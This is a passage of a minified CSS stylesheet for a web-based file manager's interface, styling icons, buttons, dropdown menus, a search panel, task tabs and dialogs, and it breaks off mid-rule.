\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left.collapse{display:block;height:auto !important;}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content 